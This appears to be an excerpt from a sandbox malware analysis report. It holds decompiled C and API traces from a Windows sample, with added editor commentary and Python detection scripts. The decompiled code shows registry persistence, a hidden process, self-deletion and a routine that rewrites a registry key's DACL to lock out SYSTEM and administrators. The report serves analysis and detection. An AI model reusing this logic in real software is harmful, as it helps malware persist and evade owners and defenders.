                                                                                				 *((intOrPtr*)(_t101 + 0xe4)) = __imp__#18;
                                                                                				 *((intOrPtr*)(_t101 + 0xe8)) = __imp__#5;
                                                                                				_t98 = __imp__#6;
                                                                                				 *((intOrPtr*)(_t101 + 0x10)) = E00404861;
                                                                                				 *((intOrPtr*)(_t101 + 0x14)) = E00405B84;
                                                                                				 *((intOrPtr*)(_t101 + 0x18)) = E00404EF2;
                                                                                				 *((intOrPtr*)(_t101 + 8)) = 0;
                                                                                				 *((intOrPtr*)(_t101 + 0xc)) = 0;
                                                                                				 *((intOrPtr*)(_t101 + 0x1c)) = E004038F0;
                                                                                				 *((intOrPtr*)(_t101 + 0x20)) = E0040384F;
                                                                                				 *((intOrPtr*)(_t101 + 0x134)) = E004035A5;
                                                                                				 *((intOrPtr*)(_t101 + 0x24)) = E00408EC5;
                                                                                				 *((intOrPtr*)(_t101 + 0x28)) = E00408EFA;
                                                                                				 *((intOrPtr*)(_t101 + 0x2c)) = E00408F28;
                                                                                				 *((intOrPtr*)(_t101 + 0x30)) = E00408F53;
                                                                                				 *((intOrPtr*)(_t101 + 0x34)) = E004022B9;
                                                                                				 *((intOrPtr*)(_t101 + 0x38)) = E004025B4;
                                                                                				 *((intOrPtr*)(_t101 + 0x3c)) = E00408F87;
                                                                                				 *((intOrPtr*)(_t101 + 0x54)) = E0040AD89;
                                                                                				 *((intOrPtr*)(_t101 + 0x58)) = E0040B211;
                                                                                				 *((intOrPtr*)(_t101 + 0x5c)) = E0040AEDD;
                                                                                				 *((intOrPtr*)(_t101 + 0x60)) = E0040F304;
                                                                                				 *((intOrPtr*)(_t101 + 0x64)) = E0040F428;
                                                                                				 *((intOrPtr*)(_t101 + 0x68)) = E0040F43E;
                                                                                				 *((intOrPtr*)(_t101 + 0x6c)) = E0040F483;
                                                                                				 *((intOrPtr*)(_t101 + 0x70)) = 0x412104;
                                                                                				 *((intOrPtr*)(_t101 + 0x74)) = E0040F26D;
                                                                                				 *((intOrPtr*)(_t101 + 0x78)) = E0040F315;
                                                                                				 *((intOrPtr*)(_t101 + 0x7c)) = E0040E52E;
                                                                                				 *((intOrPtr*)(_t101 + 0x80)) = E0040E318;
                                                                                				 *((intOrPtr*)(_t101 + 0x84)) = E0040EAAF;
                                                                                				 *((intOrPtr*)(_t101 + 0x88)) = E0040E7B4;
                                                                                				 *((intOrPtr*)(_t101 + 0x8c)) = E0040DD05;
                                                                                				 *((intOrPtr*)(_t101 + 0x90)) = E0040E7FF;
                                                                                				 *((intOrPtr*)(_t101 + 0x94)) = E0040DD69;
                                                                                				 *((intOrPtr*)(_t101 + 0x98)) = E0040E819;
                                                                                				 *((intOrPtr*)(_t101 + 0x9c)) = E0040E854;
                                                                                				 *((intOrPtr*)(_t101 + 0xa0)) = E0040E8A1;
                                                                                				 *((intOrPtr*)(_t101 + 0xa4)) = E0040EA84;
                                                                                				 *((intOrPtr*)(_t101 + 0xa8)) = E0040DF4C;
                                                                                				 *((intOrPtr*)(_t101 + 0xac)) = E0040DF70;
                                                                                				 *((intOrPtr*)(_t101 + 0xb0)) = E0040E654;
                                                                                				 *((intOrPtr*)(_t101 + 0xb4)) = E0040E749;
                                                                                				 *((intOrPtr*)(_t101 + 0xb8)) = E004030B5;
                                                                                				 *((intOrPtr*)(_t101 + 0xbc)) = 0;
                                                                                				 *((intOrPtr*)(_t101 + 0xec)) = _t98;
                                                                                				 *((intOrPtr*)(_t101 + 0xf0)) = E00402684;
                                                                                				 *((intOrPtr*)(_t101 + 0xf4)) = E004026B2;
                                                                                				 *((intOrPtr*)(_t101 + 0xf8)) = E00402EF8;
                                                                                				 *((intOrPtr*)(_t101 + 0xfc)) = E00402F22;
                                                                                				 *((intOrPtr*)(_t101 + 0x100)) = 0;
                                                                                				 *((intOrPtr*)(_t101 + 0x104)) = 0;
                                                                                				 *((intOrPtr*)(_t101 + 0x108)) = 0;
                                                                                				 *((intOrPtr*)(_t101 + 0x10c)) = 0;
                                                                                				 *((intOrPtr*)(_t101 + 0x110)) = 0;
                                                                                				 *((intOrPtr*)(_t101 + 0x114)) = E0040A7C1;
                                                                                				 *((intOrPtr*)(_t101 + 0x118)) = E00401FEB;
                                                                                				 *((intOrPtr*)(_t101 + 0x11c)) = 0x401ffe;
                                                                                				 *((intOrPtr*)(_t101 + 0x138)) = E00406509;
                                                                                				 *((intOrPtr*)(_t101 + 0x140)) = E00405D34;
                                                                                				 *((intOrPtr*)(_t101 + 0x144)) = E00405C05;
                                                                                				 *((intOrPtr*)(_t101 + 0x148)) = E00405D93;
                                                                                				 *((intOrPtr*)(_t101 + 0x14c)) = E00405E37;
                                                                                				 *((intOrPtr*)(_t101 + 0x150)) = E004048C9;
                                                                                				 *((intOrPtr*)(_t101 + 0x154)) = E00405E21;
                                                                                				 *((intOrPtr*)(_t101 + 0x158)) = E00405CE1;
                                                                                				 *((intOrPtr*)(_t101 + 0x15c)) = E00405DED;
                                                                                				 *((intOrPtr*)(_t101 + 0x160)) = E00404EFD;
                                                                                				 *((intOrPtr*)(_t101 + 0x164)) = E004048C9;
                                                                                				 *((intOrPtr*)(_t101 + 0x168)) = E0040488C;
                                                                                				 *((intOrPtr*)(_t101 + 0x174)) = E00404F13;
                                                                                				 *((intOrPtr*)(_t101 + 0x178)) = E00404F50;
                                                                                				 *((intOrPtr*)(_t101 + 0x17c)) = E004082BB;
                                                                                				 *((intOrPtr*)(_t101 + 0x180)) = E004082C1;
                                                                                				 *((intOrPtr*)(_t101 + 0x184)) = 0x4082c7;
                                                                                				 *((intOrPtr*)(_t101 + 0x188)) = 0x408308;
                                                                                				return _t98;
                                                                                			}






                                                                                 Instruction address column 0x004088b1 .. 0x00408bb2 (88 addresses; the opcode text of this listing was not captured in the extract)

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b87d996b03424d41ecd054f3042c71836826564e4b1ffe17874333ad5a991b34
                                                                                • Instruction ID: 64893a5cec851924fefc00027ac9d8258265f32e823952a4835c6918c3f2ac29
                                                                                • Opcode Fuzzy Hash: b87d996b03424d41ecd054f3042c71836826564e4b1ffe17874333ad5a991b34
                                                                                • Instruction Fuzzy Hash: 59714BB4501B41CFD360CF66D548782BBE0BB54308F10CD6ED5AAAB790DBB86588DF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.290625632.00000000007B6000.00000040.00000020.00020000.00000000.sdmp, Offset: 007B6000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7b6000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                • Instruction ID: 8d065e3dfa3762279c5530838fe6b7424c9358bcd16179978c9c063e80d79151
                                                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                • Instruction Fuzzy Hash: D9117C72350100AFD744DE65DC91FE673EAEB89320B298065EA14CB316E679EC01C760
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                • Instruction ID: 62ef794621d5ea3b2d77e87dd9d73198f7d5adc64546af18e458383c1f14b76b
                                                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                • Instruction Fuzzy Hash: C701F272A107008FDF22EF20C805BAB33E6FB86316F0540A4D94A97281E770A8498B80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ExitProcess.KERNEL32 ref: 02089E6D
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 02089FE1
                                                                                • lstrcat.KERNEL32(?,?), ref: 02089FF2
                                                                                • lstrcat.KERNEL32(?,0041070C), ref: 0208A004
                                                                                • GetFileAttributesExA.KERNEL32(?,?,?), ref: 0208A054
                                                                                • DeleteFileA.KERNEL32(?), ref: 0208A09F
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 0208A0D6
                                                                                • lstrcpy.KERNEL32 ref: 0208A12F
                                                                                • lstrlen.KERNEL32(00000022), ref: 0208A13C
                                                                                • GetTempPathA.KERNEL32(000001F4,?), ref: 02089F13
                                                                                  • Part of subcall function 02087029: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000), ref: 02087081
                                                                                  • Part of subcall function 02086F30: GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\seokopfr,02087043), ref: 02086F4E
                                                                                  • Part of subcall function 02086F30: GetProcAddress.KERNEL32(00000000), ref: 02086F55
                                                                                  • Part of subcall function 02086F30: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 02086F7B
                                                                                  • Part of subcall function 02086F30: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02086F92
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,?,00000103,?,?,?,?), ref: 0208A1A2
                                                                                • RegSetValueExA.ADVAPI32(?,00000001,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 0208A1C5
                                                                                • GetModuleHandleA.KERNEL32(?,?,00000104,?,?,00000010,?,?,00000044,?,?,?,?,?,?,00000103), ref: 0208A214
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,?,00000104,?,?,00000010,?,?,00000044), ref: 0208A21B
                                                                                • GetDriveTypeA.KERNEL32(?), ref: 0208A265
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0208A29F
                                                                                • lstrcat.KERNEL32(?,00410A34), ref: 0208A2C5
                                                                                • lstrcat.KERNEL32(?,00000022), ref: 0208A2D9
                                                                                • lstrcat.KERNEL32(?,00410A34), ref: 0208A2F4
                                                                                • wsprintfA.USER32 ref: 0208A31D
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0208A345
                                                                                • lstrcat.KERNEL32(?,?), ref: 0208A364
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?,?,00000010), ref: 0208A387
                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?), ref: 0208A398
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 0208A1D1
                                                                                  • Part of subcall function 02089966: RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 0208999D
                                                                                  • Part of subcall function 02089966: RegDeleteValueA.ADVAPI32(?,00000000), ref: 020899BD
                                                                                  • Part of subcall function 02089966: RegCloseKey.ADVAPI32(?), ref: 020899C6
                                                                                • GetModuleHandleA.KERNEL32(?,?,0000012C), ref: 0208A3DB
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,?,0000012C), ref: 0208A3E2
                                                                                • GetDriveTypeA.KERNEL32(00000022), ref: 0208A41D
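
The API sequence above (temp path lookup, a RegOpenKeyExA on hive 80000001 = HKEY_CURRENT_USER followed by RegSetValueExA, a CreateProcessA whose creation-flags argument is 08000000 = CREATE_NO_WINDOW, then DeleteFileA) is what the "Deletes itself after installation" and registry-persistence signatures in the overview are consistent with. The Python below is an added example (editor's code, not part of the Joe Sandbox report or of the sample): a parser for the report's API-trace line format, fed with lines copied from the list above, and a rule that pulls the HKCU write, the hidden child process and the delete-after-spawn out of the parsed calls. The hive table and the CREATE_NO_WINDOW value are from the Windows SDK; the rule itself and the field names are the editor's choice.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Sample input: a subset of the API-trace lines from the report above, copied
# verbatim (the indented line is a "Part of subcall function" entry), so the
# parser runs offline.
SAMPLE_TRACE = r"""• ExitProcess.KERNEL32 ref: 02089E6D
• lstrcat.KERNEL32(?,0041070C), ref: 0208A004
• GetTempPathA.KERNEL32(000001F4,?), ref: 02089F13
  • Part of subcall function 02086F30: GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\seokopfr,02087043), ref: 02086F4E
• RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,?,00000103,?,?,?,?), ref: 0208A1A2
• RegSetValueExA.ADVAPI32(?,00000001,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 0208A1C5
• CreateProcessA.KERNEL32(?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?,?,00000010), ref: 0208A387
• DeleteFileA.KERNEL32(?,?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?), ref: 0208A398
"""

# One trace line: "• [Part of subcall function XXXX: ]Api.MODULE[(args)], ref: ADDR"
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Predefined hive handles (winreg.h) and the creation flag seen in the trace.
HIVES = {"80000000": "HKEY_CLASSES_ROOT", "80000001": "HKEY_CURRENT_USER",
         "80000002": "HKEY_LOCAL_MACHINE", "80000003": "HKEY_USERS"}
CREATE_NO_WINDOW = 0x08000000
PIPE_PREFIX = "\\\\.\\pipe\\"


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                          # call-site address as printed by the report
    subcall_of: Optional[str] = None  # callee address when the line is a "Part of subcall" entry


def parse_trace(text: str) -> List[ApiCall]:
    """Turn the report's API list into ApiCall records; non-matching lines (headers) are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append(ApiCall(m.group("api"), m.group("module"),
                             args.split(",") if args else [],
                             m.group("ref").upper(), m.group("caller")))
    return calls


def analyze(calls: List[ApiCall]) -> Dict[str, object]:
    """Editor's triage rule over the call sequence (order as listed in the report)."""
    findings: Dict[str, object] = {"hkcu_value_write": False, "hidden_process": None,
                                   "delete_after_spawn": False, "named_pipes": []}
    open_hive = None
    spawned = False
    for c in calls:
        if c.api == "RegOpenKeyExA" and c.args:
            open_hive = HIVES.get(c.args[0].lower())        # hKey is the first argument
        elif c.api == "RegSetValueExA" and open_hive == "HKEY_CURRENT_USER":
            findings["hkcu_value_write"] = True
        elif c.api == "CreateProcessA" and len(c.args) > 5:
            try:
                flags = int(c.args[5], 16)                  # dwCreationFlags is the sixth argument
            except ValueError:                              # "?" means the sandbox could not resolve it
                flags = 0
            if flags & CREATE_NO_WINDOW:
                findings["hidden_process"] = c.ref
            spawned = True
        elif c.api == "DeleteFileA" and spawned:
            findings["delete_after_spawn"] = True
        for a in c.args:
            if a.lower().startswith(PIPE_PREFIX):
                findings["named_pipes"].append(a)
    return findings


if __name__ == "__main__":
    for k, v in analyze(parse_trace(SAMPLE_TRACE)).items():
        print(f"{k}: {v}")
```

The same parser accepts the whole "APIs" block of a function when pasted in; the "Strings" and "Memory Dump Source" lines simply fail the regex and are ignored.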
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$FileModule$DeleteHandle$CloseDirectoryDriveNameOpenProcessTypeValuelstrcpy$AddressAttributesCreateEnvironmentExitInformationPathProcSystemTempVariableVolumeWindowslstrlenwsprintf
                                                                                • String ID: "$"$"$D$P$\
                                                                                • API String ID: 1653845638-2605685093
                                                                                • Opcode ID: 367b9be05492a2edfb885d1a7c41413b002776b69c7dc48c576c8fe787930bc5
                                                                                • Instruction ID: 28fd8a5d5409e48a19639d5ac27e3444c7a780dba533511ee68cb6634163492c
                                                                                • Opcode Fuzzy Hash: 367b9be05492a2edfb885d1a7c41413b002776b69c7dc48c576c8fe787930bc5
                                                                                • Instruction Fuzzy Hash: 07F141B1D4035DAFDF22EBA08C88FEF7BBCAB08304F0444A6E645E2141E77596859F64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
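
The decompiled function E00407A95 that follows rewrites the DACL of a registry key: it opens the key with WRITE_DAC | WRITE_OWNER | READ_CONTROL, resolves the current user's SID, reads the owner and DACL with RegGetKeySecurity, and walks the ACEs, setting the mask of the current user's ACE to 0xe0039 or 0xf003f (KEY_ALL_ACCESS) and the mask of every other SID's ACE to 0x20000 (READ_CONTROL) only, so other principals can still read the key's permissions but not its values. The Python below is an added example (editor's code, not from the report or the sample) that models that mask arithmetic and checks a DACL for the resulting shape. The right-name table is from the Windows SDK headers, the SIDs in the sample DACL are constructed, and the assumption that a nonzero third argument selects the KEY_ALL_ACCESS variant is the editor's reading of the sbb sequence.

```python
# Registry access-mask bits (values from the Windows SDK headers winnt.h / winreg.h).
KEY_QUERY_VALUE        = 0x0001
KEY_SET_VALUE          = 0x0002
KEY_CREATE_SUB_KEY     = 0x0004
KEY_ENUMERATE_SUB_KEYS = 0x0008
KEY_NOTIFY             = 0x0010
KEY_CREATE_LINK        = 0x0020
KEY_WOW64_64KEY        = 0x0100
DELETE                 = 0x00010000
READ_CONTROL           = 0x00020000
WRITE_DAC              = 0x00040000
WRITE_OWNER            = 0x00080000
KEY_READ               = 0x00020019
KEY_ALL_ACCESS         = 0x000F003F

RIGHT_NAMES = [
    (KEY_QUERY_VALUE, "KEY_QUERY_VALUE"), (KEY_SET_VALUE, "KEY_SET_VALUE"),
    (KEY_CREATE_SUB_KEY, "KEY_CREATE_SUB_KEY"), (KEY_ENUMERATE_SUB_KEYS, "KEY_ENUMERATE_SUB_KEYS"),
    (KEY_NOTIFY, "KEY_NOTIFY"), (KEY_CREATE_LINK, "KEY_CREATE_LINK"),
    (KEY_WOW64_64KEY, "KEY_WOW64_64KEY"), (DELETE, "DELETE"), (READ_CONTROL, "READ_CONTROL"),
    (WRITE_DAC, "WRITE_DAC"), (WRITE_OWNER, "WRITE_OWNER"),
]


def decode_mask(mask: int) -> list:
    """Names of the rights set in a registry ACCESS_MASK, unknown bits appended as hex."""
    names = [name for bit, name in RIGHT_NAMES if mask & bit]
    leftover = mask & ~sum(bit for bit, _ in RIGHT_NAMES)
    if leftover:
        names.append(hex(leftover))
    return names


def rewritten_mask(is_current_user: bool, full_control: bool) -> int:
    """Mask the sample stores into an ACE, mirroring the arithmetic at the EqualSid branch.
    Assumption: full_control corresponds to a nonzero third argument of E00407A95."""
    if not is_current_user:
        return READ_CONTROL                                   # 0x20000 for every other SID
    base = (WRITE_OWNER | WRITE_DAC | READ_CONTROL | KEY_CREATE_LINK
            | KEY_NOTIFY | KEY_ENUMERATE_SUB_KEYS | KEY_QUERY_VALUE)   # 0xe0039
    extra = DELETE | KEY_CREATE_SUB_KEY | KEY_SET_VALUE       # 0x10006, the optional term
    return base + extra if full_control else base             # 0xf003f == KEY_ALL_ACCESS


def rewrite_dacl(aces, current_user_sid, full_control):
    """aces: list of (sid, mask). Returns the rewritten list and whether any mask changed
    (the decompiled function tracks the same thing in _v24)."""
    new, changed = [], False
    for sid, mask in aces:
        m = rewritten_mask(sid == current_user_sid, full_control)
        changed = changed or (m != mask)
        new.append((sid, m))
    return new, changed


def looks_locked_down(aces, current_user_sid) -> bool:
    """Detection heuristic: every ACE not belonging to the current user is READ_CONTROL only
    and the current user's ACE carries WRITE_DAC | WRITE_OWNER."""
    others = [m for s, m in aces if s != current_user_sid]
    mine = [m for s, m in aces if s == current_user_sid]
    return (bool(others) and all(m == READ_CONTROL for m in others)
            and any((m & (WRITE_DAC | WRITE_OWNER)) == (WRITE_DAC | WRITE_OWNER) for m in mine))


# Constructed sample: a typical DACL on a key under HKCU before the sample touches it.
CURRENT_USER = "S-1-5-21-1000000000-2000000000-3000000000-1001"   # constructed user SID
SAMPLE_DACL = [
    (CURRENT_USER, KEY_ALL_ACCESS),
    ("S-1-5-18", KEY_ALL_ACCESS),       # LOCAL SYSTEM
    ("S-1-5-32-544", KEY_ALL_ACCESS),   # BUILTIN\Administrators
    ("S-1-5-12", KEY_READ),             # RESTRICTED
]

if __name__ == "__main__":
    after, changed = rewrite_dacl(SAMPLE_DACL, CURRENT_USER, True)
    for sid, mask in after:
        print(sid, hex(mask), decode_mask(mask))
    print("changed:", changed, "locked down:", looks_locked_down(after, CURRENT_USER))
```

On a live host the same check runs over the ACEs returned by Get-Acl (or RegGetKeySecurity) for the key in question; a DACL in which SYSTEM and Administrators hold only READ_CONTROL is not something the operating system or normal installers produce.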

                                                                                C-Code - Quality: 99%
                                                                                			E00407A95(void* _a4, char* _a8, signed int _a12) {
                                                                                				int _v8;
                                                                                				void* _v12;
                                                                                				void* _v16;
                                                                                				void* _v20;
                                                                                				int _v24;
                                                                                				void* _v28;
                                                                                				struct _ACL* _v32;
                                                                                				long _v36;
                                                                                				long _v40;
                                                                                				long _v44;
                                                                                				int _v48;
                                                                                				int _v52;
                                                                                				union _SID_NAME_USE _v56;
                                                                                				int _v60;
                                                                                				int _v64;
                                                                                				void _v132;
                                                                                				char _v388;
                                                                                				char _v516;
                                                                                				struct _SECURITY_DESCRIPTOR _v1540;
                                                                                				void* _t95;
                                                                                				void* _t104;
                                                                                				void* _t107;
                                                                                				void* _t111;
                                                                                				void* _t116;
                                                                                				struct _ACL* _t117;
                                                                                				void* _t118;
                                                                                				void* _t120;
                                                                                				void* _t122;
                                                                                				void* _t123;
                                                                                				void* _t125;
                                                                                				char* _t126;
                                                                                				void* _t130;
                                                                                				void* _t134;
                                                                                				void* _t135;
                                                                                				signed int _t136;
                                                                                				void* _t143;
                                                                                				void* _t146;
                                                                                				int _t148;
                                                                                				int _t151;
                                                                                				void** _t159;
                                                                                				void* _t161;
                                                                                				void* _t164;
                                                                                				signed int _t172;
                                                                                				void* _t173;
                                                                                				char* _t174;
                                                                                				void* _t175;
                                                                                				void* _t176;
                                                                                
                                                                                				_v32 = 0;
                                                                                				_v12 = 0;
                                                                                				_v28 = 0;
                                                                                 				/* 0xe0100 = WRITE_OWNER | WRITE_DAC | READ_CONTROL | KEY_WOW64_64KEY: enough to rewrite the key's security descriptor */
                                                                                 				if(RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28) != 0) {
                                                                                					return 0;
                                                                                				}
                                                                                				_v40 = 0x80;
                                                                                				_t95 = GetUserNameA( &_v388,  &_v40);
                                                                                				__eflags = _t95;
                                                                                				if(_t95 == 0) {
                                                                                					L48:
                                                                                					RegCloseKey(_v28);
                                                                                					return _v12;
                                                                                				} else {
                                                                                					_v36 = 0x44;
                                                                                					_v44 = 0x80;
                                                                                					_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56);
                                                                                					__eflags = _t104;
                                                                                					if(_t104 == 0) {
                                                                                						goto L48;
                                                                                					}
                                                                                					_v48 = 0x400;
                                                                                 					/* 5 = OWNER_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION, read into a 0x400-byte self-relative descriptor */
                                                                                 					_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48);
                                                                                					__eflags = _t107;
                                                                                					if(_t107 != 0) {
                                                                                						goto L48;
                                                                                					}
                                                                                					_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
                                                                                					__eflags = _t111;
                                                                                					if(_t111 == 0) {
                                                                                						L12:
                                                                                						_v24 = 0;
                                                                                						_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
                                                                                						__eflags = _t116;
                                                                                						if(_t116 == 0) {
                                                                                							L47:
                                                                                							goto L48;
                                                                                						}
                                                                                						_t117 = _v32;
                                                                                						__eflags = _t117;
                                                                                						if(_t117 == 0) {
                                                                                							goto L47;
                                                                                						}
                                                                                						_t164 = 0;
                                                                                						_v8 = 0;
                                                                                						__eflags = 0 - _t117->AceCount;
                                                                                						if(0 >= _t117->AceCount) {
                                                                                							goto L47;
                                                                                						} else {
                                                                                							goto L15;
                                                                                						}
                                                                                						do {
                                                                                							L15:
                                                                                							_t118 = GetAce(_t117, _v8,  &_v20);
                                                                                							__eflags = _t118;
                                                                                							if(_t118 == 0) {
                                                                                								L31:
                                                                                								_t73 =  &_v8;
                                                                                								 *_t73 = _v8 + 1;
                                                                                								__eflags =  *_t73;
                                                                                								goto L32;
                                                                                							}
                                                                                							_t172 = 0;
                                                                                 							_v16 = _v20 + 8; /* SID of an ACCESS_ALLOWED_ACE follows the 4-byte header and 4-byte mask */
                                                                                							__eflags = _t164;
                                                                                							if(_t164 <= 0) {
                                                                                								L21:
                                                                                								__eflags = _t164 - 0x20;
                                                                                								if(_t164 < 0x20) {
                                                                                									 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16;
                                                                                									_t164 = _t164 + 1;
                                                                                									__eflags = _t164;
                                                                                								}
                                                                                								_t134 = EqualSid( &_v132, _v16);
                                                                                								_t159 = _v20;
                                                                                								__eflags = _t134;
                                                                                								if(_t134 == 0) {
                                                                                									_t135 = 0x20000;
                                                                                								} else {
                                                                                									asm("sbb eax, eax");
                                                                                									_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
                                                                                								}
                                                                                								__eflags = _t159[1] - _t135;
                                                                                								if(_t159[1] != _t135) {
                                                                                									_t159[1] = _t135;
                                                                                									_t159 = _v20;
                                                                                									_v24 = 1;
                                                                                								}
                                                                                								__eflags =  *_t159;
                                                                                								if( *_t159 != 0) {
                                                                                									L30:
                                                                                									 *_t159 = 0;
                                                                                									_t136 = _v16;
                                                                                									__eflags =  *(_t136 + 8);
                                                                                									_t68 =  *(_t136 + 8) == 0;
                                                                                									__eflags = _t68;
                                                                                									_v24 = 1;
                                                                                									 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8;
                                                                                									goto L31;
                                                                                								} else {
                                                                                									__eflags = _t159[0] & 0x00000010;
                                                                                									if((_t159[0] & 0x00000010) == 0) {
                                                                                										goto L31;
                                                                                									}
                                                                                									goto L30;
                                                                                								}
                                                                                							} else {
                                                                                								goto L17;
                                                                                							}
                                                                                							while(1) {
                                                                                								L17:
                                                                                								_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
                                                                                								__eflags = _t143;
                                                                                								if(_t143 != 0) {
                                                                                									break;
                                                                                								}
                                                                                								_t172 = _t172 + 1;
                                                                                								__eflags = _t172 - _t164;
                                                                                								if(_t172 < _t164) {
                                                                                									continue;
                                                                                								}
                                                                                								break;
                                                                                							}
                                                                                							__eflags = _t172 - _t164;
                                                                                							if(_t172 >= _t164) {
                                                                                								goto L21;
                                                                                							}
                                                                                							DeleteAce(_v32, _v8);
                                                                                							_v24 = 1;
                                                                                							L32:
                                                                                							_t117 = _v32;
                                                                                							__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
                                                                                						} while (_v8 < (_t117->AceCount & 0x0000ffff));
                                                                                						__eflags = _v24;
                                                                                						if(_v24 == 0) {
                                                                                							goto L47;
                                                                                						}
                                                                                						__eflags =  *0x4121a8; // 0x0
                                                                                						if(__eflags == 0) {
                                                                                							L41:
                                                                                							_v12 = 1;
                                                                                							_t173 = LocalAlloc(0x40, 0x14);
                                                                                							__eflags = _t173;
                                                                                							if(_t173 != 0) {
                                                                                								_t120 = InitializeSecurityDescriptor(_t173, 1);
                                                                                								__eflags = _t120;
                                                                                								if(_t120 != 0) {
                                                                                									_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0);
                                                                                									__eflags = _t122;
                                                                                									if(_t122 != 0) {
                                                                                										_t123 = RegSetKeySecurity(_v28, 4, _t173);
                                                                                										__eflags = _t123;
                                                                                										if(_t123 == 0) {
                                                                                											_v12 = 1;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                								LocalFree(_t173);
                                                                                							}
                                                                                							goto L47;
                                                                                						}
                                                                                						__eflags =  *0x412cc0; // 0x0
                                                                                						if(__eflags == 0) {
                                                                                							goto L41;
                                                                                						}
                                                                                						_v12 = 0;
                                                                                						_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12);
                                                                                						__eflags = _t125;
                                                                                						if(_t125 != 0) {
                                                                                							goto L41;
                                                                                						}
                                                                                						_t126 = 0x4121a8;
                                                                                						_t83 =  &(_t126[1]); // 0x4121a9
                                                                                						_t174 = _t83;
                                                                                						do {
                                                                                							_t161 =  *_t126;
                                                                                							_t126 =  &(_t126[1]);
                                                                                							__eflags = _t161;
                                                                                						} while (_t161 != 0);
